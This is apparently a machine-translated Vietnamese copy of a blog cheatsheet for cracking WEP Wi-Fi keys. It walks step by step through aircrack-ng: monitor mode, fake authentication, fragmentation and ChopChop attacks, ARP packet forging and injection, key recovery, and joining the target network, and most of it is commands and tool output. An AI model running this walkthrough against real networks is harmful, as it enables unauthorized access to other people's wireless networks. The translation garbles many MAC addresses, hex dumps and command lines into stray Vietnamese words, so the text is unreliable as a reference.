WEP CRACKING CHEATSHEET

Điều này không có gì mới và hầu hết các chi tiết cuộc tấn công xuất phát từ Hacking tuyệt vời xúc: Wireless Second Edition, tôi chỉ muốn có một tấm tham khảo nhanh cho các lệnh để crack mạng WEP.
Tôi đang sử dụng một AWUS036H ALFA kết nối với Acer Aspire One D255 chạy Backtrack 5. Điều đầu tiên tôi đã tìm thấy với điều này thiết lập là các mô-đun hạt nhân rtl8187 dường như mâu thuẫn với các iwlagn điều khiển không dây của Intel, vì vậy tôi chỉ cần loại bỏ Intel là một trong khi tôi đang sử dụng ALFA.

# Rmmod iwlagn

Sau đó cắm vào ALFA. Bạn sẽ thấy một cái gì đó như sau trong / var / log / messages:

Nov 25 10:07:15 hạt nhân nhỏ: [902,196162] usb 1-2: mới tốc độ cao USB thiết bị số 5 sử dụng ehci_hcd
Ngày 25 tháng 11 10:07:15 hạt nhân nhỏ: [902,656669] ieee80211 phy3: hwaddr 00: c0: ca: 40: Quảng cáo: 17, RTL8187vB (mặc định) V1 + rtl
8225z2, rfkill mặt nạ 2
Ngày 25 tháng 11 10:07:15 nhỏ kernel: [902,676112] rtl8187: ID khách hàng là 0xFF
Ngày 25 tháng 11 10:07:15 hạt nhân nhỏ: [902,677228] rtl8187: chuyển đổi không dây trên
Ngày 25 tháng 11 10:07:15 hạt nhân nhỏ: [902,677402] usbcore: Đăng ký giao diện mới lái xe rtl8187
Ngày 25 tháng 11 10:07:15 hạt nhân nhỏ: [902,726509] udev: đổi tên giao diện mạng wlan0 để wlan1
Chạy airmon-ng để kiểm tra xem mọi thứ được nhìn ok:

# Airmon-ng
Giao diện Chipset Driver

wlan1 Realtek RTL8187L rtl8187 - [phy3]
wlan1 có thể được sử dụng với các công cụ aircrack, điều này là tốt. Bắt đầu chế độ màn hình:

# Airmon-ng bắt đầu wlan1
Bây giờ bạn có thể bắt đầu chụp lưu lượng không dây. Bạn có thể sử dụng với kismet hay airodump-ng. Kismet là một công cụ tuyệt vời với rất nhiều tính năng hữu ích. Tôi không nhiều của một fan hâm mộ của giao diện người dùng newcore phải trung thực nhưng chạy các máy chủ kismet cung cấp cho bạn với một số tập tin đầu ra tuyệt vời và có tích hợp GPS quá cho lòng tốt vị trí.

Khi tôi đang làm một đánh giá, mặc dù tôi có xu hướng thoát ra khỏi airodump-ng. Tôi chỉ thấy giao diện của nó rõ ràng hơn và cuối cùng nó chơi độc đáo với các công cụ aircrack khác mà bạn sẽ sử dụng để tấn công các mạng lưới.

# Airodump-ng mon0

Điều này tự nó sẽ không ghi lại bất kỳ đầu ra bất cứ nơi nào để mình chỉ cho bạn biết những gì trên mạng. Vì vậy, chúng tôi xác định một mạng WEP, như được biểu thị bởi WEP trong cột ENC:

[CH 4] [đã qua: 2 phút] [2011/11/25 11:12

BSSID PWR Beacons # Data, # / s CH MB ENC CIPHER AUTH ESSID

de: quảng cáo: de: quảng cáo: là: ef -66 76 3 0 11 54E WEP WEP BTHomeHub2-1234
Các định dạng trên sucks nhưng chúng ta có thể nhìn thấy ESSID BTHomeHub2-1234 trên kênh 11 đang chạy WEP. Chúng ta cũng có thể thấy không có nhiều dữ liệu trên đó. 4 gói. Chúng tôi đang hoặc quá xa (Power -67 là không lớn) hoặc không có ai sử dụng nó. Tiệm cận có thể là một vấn đề nhưng không có ai trên đó không.

Điều đầu tiên cần lưu ý với một mạng WEP là bạn có thể crack mọi người duy nhất. Nó không phụ thuộc vào "mật khẩu" được sử dụng để bảo vệ nó hoặc bất cứ điều gì như thế. Cách nó sử dụng RC4 là về cơ bản bị phá vỡ và các cuộc tấn công hiện nay rất hiệu quả mà bạn có thể phá vỡ bất kỳ phím nào, thường chỉ trong vài phút, thậm chí trên một máy tính xách tay.

Với WEP tôi có xu hướng không để cả với bất kỳ của vô số các cuộc tấn công có sẵn, tôi đi thẳng cho tĩnh mạch cảnh và crack phím. Nó không bao giờ thất bại chưa vậy tại sao lãng phí thời gian với các cuộc tấn công khác?

Tấn công một mạng WEP không có khách hàng

Ý tưởng cơ bản là để "bơm" giao thông vào mạng để tạo ra đủ số lượng IVs yếu để crack WEP key.

1. Bắt đầu thu thập dữ liệu

Bắt đầu thu thập dữ liệu vào một tập tin:

# Airodump-ng --channel 11 --bssid de: quảng cáo: de: quảng cáo: là: ef --write BTHomeHub2-1234 mon0
Tôi chọn để ghi dữ liệu vào một tập tin đặt tên theo ESSID.

2. auth Fake

Bây giờ chúng ta cần phải thực hiện một auth giả với AP. Lấy địa chỉ MAC của giao diện mon0:

# Ifconfig mon0
mon0 Liên kết encap: UNSPEC HWaddr 00-C0-CA-40-AD-17-00-00-00-00-00-00-00-00-00-00
NOTRAILERS UP BROADCAST RUNNING PROMISC ALLMULTI MTU: 1500 Metric: 1
gói RX: 26.335 lỗi: 0 giảm: 3078 vượt: 0 khung: 0
gói TX: 0 lỗi: 0 giảm: 0 vượt: 0 hãng: 0
va chạm: 0 txqueuelen: 1000
RX byte: 5010971 (5.0 MB) TX byte: 0 (0.0 B)
Trao đổi các dấu gạch nối cho dấu hai chấm và sử dụng nó trong các lệnh sau đây:

# Aireplay-ng --fakeauth 0 -o 1 -e BTHomeHub2-1234 -a de: quảng cáo: de: quảng cáo: là: ef -h 00: C0: CA: 40: AD: 17 mon0
Bạn sẽ nhận được:

11:38:43 Chờ khung đèn hiệu (BSSID: de: quảng cáo: de: quảng cáo: là: ef) trên kênh 11

11:38:43 gửi xác thực yêu cầu (Open System) [ACK]
11:38:43 Xác thực thành công
11:38:43 gửi Hiệp hội Yêu cầu [ACK]
11:38:43 Hiệp hội thành công :-) (AID: 1)
Nếu xác thực không thành công có thể có MAC lọc để có được xung quanh. Tôi sẽ bàn đến một thời điểm khác có thể. Trong màn hình airodump-ng thì bạn nên địa chỉ MAC của bạn trong danh sách khách hàng bây giờ.

tấn công phân mảnh 3. Launch

Chúng tôi sẽ cố gắng một cuộc tấn công phân mảnh đầu tiên, sau đó là một cuộc tấn công ChopChop nếu điều này là không thành công.

# Aireplay-ng --fragment -b de: quảng cáo: de: quảng cáo: là: ef -h 00: C0: CA: 40: AD: 17 mon0

11:46:22 Chờ khung đèn hiệu (BSSID: de: quảng cáo: de: quảng cáo: là: ef) trên kênh 11
11:46:22 Chờ đợi một gói dữ liệu ...
Đọc 579 gói ...

Kích thước: 68, FromDS: 1, tods: 0 (WEP)

BSSID = de: quảng cáo: de: quảng cáo: là: ef
Đích. MAC = FF: FF: FF: FF: FF: FF
Nguồn MAC = 00: 24: 17: 16: 85: 0E

0x0000: 0862 0000 ffff ffff ffff chết mê chết .b thịt bò ......... $, fF.
0x0010:.? 0024 1716 850e e08e 4547 3f00 626c 8e77 $ ...... EG .bl.w
0x0020:. 6371 b3ee bc9c e6d0 c16d 0f29 54f0 5344 cq ....... m) T.SD
0x0030: 129F 00c9 c491 0ff7 92df 984a 8009 5859 ........... J..XY
0x0040: cc5a ecb0 .Z ..

Sử dụng gói này? y

Tiết kiệm gói lựa chọn trong replay_src-1125-114651.cap
gói 11:47:06 dữ liệu được tìm thấy!
11:47:06 gửi gói tin bị phân mảnh
11:47:06 Chấn chuyển tiếp gói tin !!
11:47:06 Đang cố gắng để có được 384 byte của một keystream
11:47:07 Chấn chuyển tiếp gói tin !!
11:47:07 Đang cố gắng để có được 1500 byte của một keystream
11:47:07 Chấn chuyển tiếp gói tin !!
Tiết kiệm keystream trong fragment-1125-114707.xor
Bây giờ bạn có thể xây dựng một gói tin với packetforge-ng ra khỏi đó 1.500 byte keystream
Nếu đây là thành công, bạn có thể bỏ qua thẳng sang Bước 5. Nếu không, hãy thử một cuộc tấn công ChopChop.

4. Khởi động một cuộc tấn công ChopChop

# Aireplay-ng --chopchop -b de: quảng cáo: de: quảng cáo: là: ef -h 00: c0: ca: 40: Quảng cáo: 17 mon0
11:50:10 Chờ khung đèn hiệu (BSSID: de: quảng cáo: de: quảng cáo: là: ef) trên kênh 11
Đọc 51 gói ...

Kích thước: 76, FromDS: 1, tods: 0 (WEP)

BSSID = de: quảng cáo: de: quảng cáo: là: ef
Đích. MAC = 01: 00: 5E: 00: 00: 01
Nguồn MAC = 00: 24: 17: 16: 85: 0E

0x0000: 0842 0000 0100 0001 5e00 chết mê chết bò .B .... ^ .... $, fF.
0x0010:.? 0024 1716 850e b00f a547 3f00 071f 4693 $ ....... G ... F.
0x0020:.. 1750 ea4c 197d b353 0675 33b6 1ed6 619a .P.L} S.u3 ... a.
0x0030: 72a5 2fa6 4a27 47a9 d830 3699 7080 597c r ./ J'G..06.p.Y |.
0x0040: 4bfc f5e8 2ed0 b711 6d02 68b2 K ....... m.h.

Sử dụng gói này? y

Tiết kiệm gói lựa chọn trong replay_src-1125-115012.cap

Bù đắp 75 (0% done) | xor = 6B | pt = D9 | 296 khung viết bằng 5040ms
Bù đắp 74 (2% done) | xor = 32 | pt = 5A | 422 khung viết bằng 7174ms
Bù đắp 73 (4% done) | xor = 8D | pt = 8F | 141 khung viết bằng 2399ms
Bù đắp 72 (7% done) | xor = 3F | pt = 52 | 270 khung viết bằng 4591ms
Bù đắp 71 (9% done) | xor = 11 | pt = 00 | 275 khung viết bằng 4674ms
Bù đắp 70 (11% thực hiện) | xor = B7 | pt = 00 | 824 khung viết bằng 14008ms
Bù đắp 69 (14% thực hiện) | xor = AD | pt = 7D | 274 khung viết bằng 4648ms
Bù đắp 68 (16% thực hiện) | xor = 2C | pt = 02 | 272 khung viết bằng 4634ms
Bù đắp 67 (19% thực hiện) | xor = E8 | pt = 00 | 539 khung viết bằng 9167ms
Bù đắp 66 (21% thực hiện) | xor = F5 | pt = 00 | 138 khung viết bằng 2332ms
Bù đắp 65 (23% thực hiện) | xor = FC | pt = 00 | 272 khung viết bằng 4633ms
Bù đắp 64 (26% thực hiện) | xor = 4B | pt = 00 | 136 khung viết bằng 2303ms
Bù đắp 63 (28% thực hiện) | xor = 62 | pt = 1E | 137 khung viết bằng 2335ms
Bù đắp 62 (30% thực hiện) | xor = B5 | pt = EC | 271 khung viết bằng 4613ms
Bù đắp 61 (33% thực hiện) | xor = E4 | pt = 64 | 275 khung viết bằng 4675ms
Bù đắp 60 (35% thực hiện) | xor = 61 | pt = 11 | 273 khung viết bằng 4637ms
Bù đắp 59 (38% thực hiện) | xor = 99 | pt = 00 | 138 khung viết bằng 2347ms
Bù đắp 58 (40% thực hiện) | xor = 36 | pt = 00 | 137 khung viết bằng 2329ms
Bù đắp 57 (42% thực hiện) | xor = 34 | pt = 04 | 137 khung viết bằng 2320ms
Bù đắp 56 (45% thực hiện) | xor = 4C | pt = 94 | 137 khung viết bằng 2345ms
Bù đắp 55 (47% thực hiện) | xor = A8 | pt = 01 | 129 khung viết bằng 2179ms
Bù đắp 54 (50% thực hiện) | xor = 47 | pt = 00 | 136 khung viết bằng 2318ms
Bù đắp 53 (52% thực hiện) | xor = 27 | pt = 00 | 276 khung viết bằng 4695ms
Bù đắp 52 (54% thực hiện) | xor = AA | pt = E0 | 276 khung viết bằng 4681ms
Bù đắp 51 (57% thực hiện) | xor = 58 | pt = FE | 135 khung viết bằng 2309ms
Bù đắp 50 (59% thực hiện) | xor = 2E | pt = 01 | 137 khung viết bằng 2329ms
Bù đắp 49 (61% thực hiện) | xor = 0D | pt = A8 | 276 khung viết bằng 4684ms
Bù đắp 48 (64% thực hiện) | xor = B2 | pt = C0 | 137 khung viết bằng 2323ms
Bù đắp 47 (66% thực hiện) | xor = 63 | pt = F9 | 135 khung viết bằng 2303ms
Bù đắp 46 (69% thực hiện) | xor = 8C | pt = ED | 275 khung viết bằng 4682ms
Bù đắp 45 (71% thực hiện) | xor = D4 | pt = 02 | 138 khung viết bằng 2338ms
Bù đắp 44 (73% thực hiện) | xor = 1F | pt = 01 | 268 khung viết bằng 4556ms
Bù đắp 43 (76% thực hiện) | xor = B6 | pt = 00 | 276 khung viết bằng 4694ms
Bù đắp 42 (78% thực hiện) | xor = 73 | pt = 40 | 550 khung viết bằng 9348ms
Bù đắp 41 (80% thực hiện) | xor = 07 | pt = 72 | 275 khung viết bằng 4674ms
Bù đắp 40 (83% thực hiện) | xor = 55 | pt = 53 | 274 khung viết bằng 4659ms
Gửi 1.940 gói, đoán hiện tại: 8C ...

AP xuất hiện để thả các gói tin nhỏ hơn 40 byte.
Việc kích hoạt workaround tiêu chuẩn: IP header tái tạo.
Điều này không giống như một gói tin IP, hãy thử một số khác.

Cảnh báo: xác minh kiểm tra ICV THẤT BẠI! Đang cố gắng khắc phục.

5. Craft một gói ARP

Với một trong hai phân mảnh hoặc tấn công ChopChop chúng tôi bây giờ có keystream phục hồi. Chúng tôi có thể sử dụng để xây dựng một gói ARP mà sẽ gây ra các AP để tạo ra lưu lượng truy cập.

# Packetforge-ng --arp -a de: quảng cáo: de: quảng cáo: là: ef -h 00: c0: ca: 40: Quảng cáo: 17 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1125-114.707 .xor -w forged_arp
Bây giờ chúng ta có một gói tin ARP đã sẵn sàng để tiêm trong forged_arp.

6. Tiêm các gói tin ARP

Bây giờ chúng tôi phát lại các gói tin ARP được mã hóa thành các mạng đích.

# Aireplay-ng -interactive -F -r ./forged_arp mon0
Nếu bạn nhìn vào sản lượng airodump-ng bây giờ, bạn sẽ thấy các cột # Data incrementing dữ dội. Nếu không, một cái gì đó đã đi sai.

7. Bắt đầu aircrack-ng

Bây giờ chúng ta có thể bắt đầu nứt bằng cách sử dụng tập tin đầu ra airodump-ng:

# Aircrack-ng ./BTHomeHub2-1234-01.cap -0

Và chờ đợi những lời kỳ diệu: KEY FOUND!

Điều quan trọng là không thể đọc được nhưng nó không cần phải được, bạn gán cho nó thẳng vào giao diện không dây trong Linux. Khi ALFA của tôi là lên và chạy lại, tôi có thể mang lại những tích hợp card không dây trở lại trực tuyến:

# Modprobe iwlagn

Sau đó thiết lập wlan0 cho phù hợp:

# Iwconfig wlan0 ESSID BTHomeHub2-1234 chìa khóa XX: XX: XX: XX: XX: XX

trong đó XX: XX: XX: XX: XX: XX là là bất cứ điều gì ra bởi Aircrack-ng. Shut down giao diện và mang nó lại lên và kiểm tra xem bạn là liên quan:

# Ifconfig wlan0 xuống

# Ifconfig wlan0 up

# Iwconfig wlan0

wlan0 IEEE 802.11bgn ESSID: "BTHomeHub2-1234?
Chế độ: Quản lý tần số: 2,462 GHz Access Point: de: quảng cáo: de: quảng cáo: là: ef
Bit Rate = 1 Mb / s Tx-Power = 14 dBm
Thử lại hạn dài: 7 RTS Thr: off Fragment Thr: off
Khoá mật mã: XX: XX: XX: XX: XX: XX
Quản lý năng lượng: off
Link Quality = 24/70 mức độ tín hiệu = -86 dBm
Rx nwid không hợp lệ: 0 Rx không hợp lệ hầm mộ: 0 Rx không hợp lệ frag: 0
Tx thử lại quá mức: 0 misc không hợp lệ: 3 đèn hiệu nhỡ: 0

https://www.4armed.com/blog/wep-cracking-cheatsheet/

Comments

Popular posts from this blog

Npcap

Monitor mode

Giới thiệu - Scapy